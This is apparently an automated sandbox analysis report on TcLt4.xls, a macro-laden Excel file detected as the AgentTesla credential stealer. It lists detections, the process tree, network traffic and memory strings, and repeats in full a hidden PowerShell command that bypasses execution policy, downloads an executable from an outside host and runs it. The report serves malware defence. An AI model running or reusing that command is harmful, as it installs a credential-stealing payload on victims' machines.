Loading ...

Play interactive tourEdit tour

Analysis Report TcLt4.xls

Overview

General Information

Sample Name:TcLt4.xls
Analysis ID:324135
MD5:4bb3584cc8f750ab27bf51e2d154496b
SHA1:bda4832689dc06c315a3b7a810814527a74915d9
SHA256:8a0de87ccaf8efb28f84081e3b589d4bd60c2da182a970838bc1e2fed0037e3e
Tags:AgentTeslaDreamhostxls

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 3296 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 5484 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • powershell.exe (PID: 5916 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • raqfxwuo.exe (PID: 6168 cmdline: 'C:\Users\Public\raqfxwuo.exe' MD5: 0998148D355B1E7BAD7B44558AA4C125)
      • raqfxwuo.exe (PID: 1692 cmdline: C:\Users\Public\raqfxwuo.exe MD5: 0998148D355B1E7BAD7B44558AA4C125)
  • powershell.exe (PID: 3480 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • raqfxwuo.exe (PID: 6484 cmdline: 'C:\Users\Public\raqfxwuo.exe' MD5: 0998148D355B1E7BAD7B44558AA4C125)
      • raqfxwuo.exe (PID: 6512 cmdline: C:\Users\Public\raqfxwuo.exe MD5: 0998148D355B1E7BAD7B44558AA4C125)
  • vlc.exe (PID: 1256 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 0998148D355B1E7BAD7B44558AA4C125)
  • vlc.exe (PID: 5088 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 0998148D355B1E7BAD7B44558AA4C125)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
TcLt4.xlsPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x30b17:$s1: powershell.exe
  • 0x30b4b:$s2: Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.924149098.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.2.raqfxwuo.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              20.2.raqfxwuo.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Executables Started in Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\raqfxwuo.exe' , CommandLine: 'C:\Users\Public\raqfxwuo.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\raqfxwuo.exe, NewProcessName: C:\Users\Public\raqfxwuo.exe, OriginalFileName: C:\Users\Public\raqfxwuo.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5916, ProcessCommandLine: 'C:\Users\Public\raqfxwuo.exe' , ProcessId: 6168
                Sigma detected: Execution in Non-Executable FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\raqfxwuo.exe' , CommandLine: 'C:\Users\Public\raqfxwuo.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\raqfxwuo.exe, NewProcessName: C:\Users\Public\raqfxwuo.exe, OriginalFileName: C:\Users\Public\raqfxwuo.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5916, ProcessCommandLine: 'C:\Users\Public\raqfxwuo.exe' , ProcessId: 6168
                Sigma detected: Suspicious Program Location Process StartsShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\raqfxwuo.exe' , CommandLine: 'C:\Users\Public\raqfxwuo.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\raqfxwuo.exe, NewProcessName: C:\Users\Public\raqfxwuo.exe, OriginalFileName: C:\Users\Public\raqfxwuo.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5916, ProcessCommandLine: 'C:\Users\Public\raqfxwuo.exe' , ProcessId: 6168

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for domain / URLShow sources
                Source: sparepartiran.comVirustotal: Detection: 10%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\Public\raqfxwuo.exeMetadefender: Detection: 21%Perma Link
                Source: C:\Users\Public\raqfxwuo.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeMetadefender: Detection: 21%Perma Link
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeReversingLabs: Detection: 55%
                Multi AV Scanner detection for submitted fileShow sources
                Source: TcLt4.xlsVirustotal: Detection: 25%Perma Link
                Source: TcLt4.xlsReversingLabs: Detection: 51%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJoe Sandbox ML: detected
                Source: C:\Users\Public\raqfxwuo.exeJoe Sandbox ML: detected
                Source: 21.2.raqfxwuo.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 20.2.raqfxwuo.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: global trafficDNS query: name: sparepartiran.com
                Source: global trafficTCP traffic: 192.168.2.4:49788 -> 162.223.88.131:80
                Source: global trafficTCP traffic: 192.168.2.4:49788 -> 162.223.88.131:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Nov 2020 11:19:01 GMTServer: ApacheLast-Modified: Thu, 26 Nov 2020 22:28:12 GMTAccept-Ranges: bytesContent-Length: 518656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 5e dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 dc 03 00 4b 00 00 00 00 e0 03 00 c8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 31 00 00 38 37 00 00 03 00 00 00 6e 00 00 06 dc 68 00 00 2a 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 42 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 3f 00 00 00 1c 00 00 00 1d 00 00 00 38 3a 00 00 00 02 28 04 00 00 06 20 01 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 2a 02 28 06 00 00 06 38 dd ff ff ff 02 28 02 00 00 06 20 00 00 00 00 17 3a b6 ff ff ff 26 38 ac ff ff ff 02 28 03 00 00 06 20 02 00 00 00 38 a0 ff ff ff 13 30 07 00 40 01 00 00 02 00 00 11 20 03 00 00 00 fe 0e 03 00 38 00 00 00 00 fe 0c 03 00 45 08 00 00 00 05 00 00 00 14 00 00 00 9b 00 00 00 c3 00 00 00 2f 00 00 00 d5 00 00 00 f9 00 00 00 d4 00 00 00 38 00 00 00 00 38 ef 00 00 00 20 04 00 00 00 38 c7 ff ff ff 73 1e 00 00 06 13 02 38 97 00 00 00 38 b0 00 00 00 20 06 00 00 00 38 ac ff ff ff 02 d0 04 00 00 01 28 02 00 00 0a 72 01 00 00 70 17 8d 05 00 00 01 13 05 11 05 16 d0 01 00 00 1b 28 0a 00 00 06 a2 11 05 28 03 00 00 0a 14 17 8d 02 00 00 01 13 04 11 04 16 11 02 28 0b 00 00 06 a2 11 04 6f 04 00 00 0a 74 04 00 00 01
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Nov 2020 11:19:01 GMTServer: ApacheLast-Modified: Thu, 26 Nov 2020 22:28:12 GMTAccept-Ranges: bytesContent-Length: 518656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 5e dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 dc 03 00 4b 00 00 00 00 e0 03 00 c8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 31 00 00 38 37 00 00 03 00 00 00 6e 00 00 06 dc 68 00 00 2a 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 42 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 3f 00 00 00 1c 00 00 00 1d 00 00 00 38 3a 00 00 00 02 28 04 00 00 06 20 01 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 2a 02 28 06 00 00 06 38 dd ff ff ff 02 28 02 00 00 06 20 00 00 00 00 17 3a b6 ff ff ff 26 38 ac ff ff ff 02 28 03 00 00 06 20 02 00 00 00 38 a0 ff ff ff 13 30 07 00 40 01 00 00 02 00 00 11 20 03 00 00 00 fe 0e 03 00 38 00 00 00 00 fe 0c 03 00 45 08 00 00 00 05 00 00 00 14 00 00 00 9b 00 00 00 c3 00 00 00 2f 00 00 00 d5 00 00 00 f9 00 00 00 d4 00 00 00 38 00 00 00 00 38 ef 00 00 00 20 04 00 00 00 38 c7 ff ff ff 73 1e 00 00 06 13 02 38 97 00 00 00 38 b0 00 00 00 20 06 00 00 00 38 ac ff ff ff 02 d0 04 00 00 01 28 02 00 00 0a 72 01 00 00 70 17 8d 05 00 00 01 13 05 11 05 16 d0 01 00 00 1b 28 0a 00 00 06 a2 11 05 28 03 00 00 0a 14 17 8d 02 00 00 01 13 04 11 04 16 11 02 28 0b 00 00 06 a2 11 04 6f 04 00 00 0a 74 04 00 00 01
                Source: Joe Sandbox ViewIP Address: 162.223.88.131 162.223.88.131
                Source: Joe Sandbox ViewASN Name: COLOUPUS COLOUPUS
                Source: global trafficHTTP traffic detected: GET /js/2Q/Jqeofcirr6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /js/2Q/Jqeofcirr6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /js/2Q/Jqeofcirr6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /js/2Q/Jqeofcirr6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: sparepartiran.com
                Source: raqfxwuo.exe, 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://HReuFq.com
                Source: powershell.exe, 0000000E.00000002.873518482.000001FCD6723000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.875739715.000001DF98621000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 0000000E.00000002.873203401.000001FCD66F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.v
                Source: raqfxwuo.exe, 00000012.00000002.902397165.00000000062E0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: powershell.exe, 0000000E.00000002.858258052.000001FCBE901000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: powershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: raqfxwuo.exe, vlc.exeString found in binary or memory: http://schemas.microso
                Source: powershell.exe, 0000000E.00000002.855256796.000001FCBE6F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.858931595.000001DF80601000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000E.00000002.860161665.000001FCBEC42000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.c
                Source: powershell.exe, 0000000E.00000002.860043403.000001FCBEC23000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.865375940.000001DF81186000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com
                Source: powershell.exe, 0000000F.00000002.867208662.000001DF813D9000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/J
                Source: PowerShell_transcript.445817.FB9lPag7.20201128121858.txt.14.dr, PowerShell_transcript.445817.3hbNPFfq.20201128121858.txt.15.drString found in binary or memory: http://sparepartiran.com/js/2Q/Jqeofcirr6.exe
                Source: powershell.exe, 0000000E.00000002.858258052.000001FCBE901000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/Jqeofcirr6.exe0ym
                Source: powershell.exe, 0000000E.00000002.860043403.000001FCBEC23000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.comx
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: raqfxwuo.exe, 00000013.00000003.860850803.00000000058D5000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/
                Source: raqfxwuo.exe, 00000012.00000002.902397165.00000000062E0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: raqfxwuo.exe, 00000013.00000003.863204233.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html~
                Source: raqfxwuo.exe, 00000013.00000003.860145524.00000000058E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: raqfxwuo.exe, 00000013.00000003.860145524.00000000058E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com8
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000003.863715280.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html)
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: raqfxwuo.exe, 00000013.00000003.863921533.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlm
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: raqfxwuo.exe, 00000013.00000003.863762863.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersg
                Source: raqfxwuo.exe, 00000012.00000002.897433239.0000000001A17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
                Source: raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalicb
                Source: raqfxwuo.exe, 00000012.00000002.897433239.0000000001A17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.com
                Source: raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.cometp/
                Source: raqfxwuo.exe, 00000012.00000002.897433239.0000000001A17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comion
                Source: raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
                Source: raqfxwuo.exe, 00000012.00000002.897433239.0000000001A17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comm2DW
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
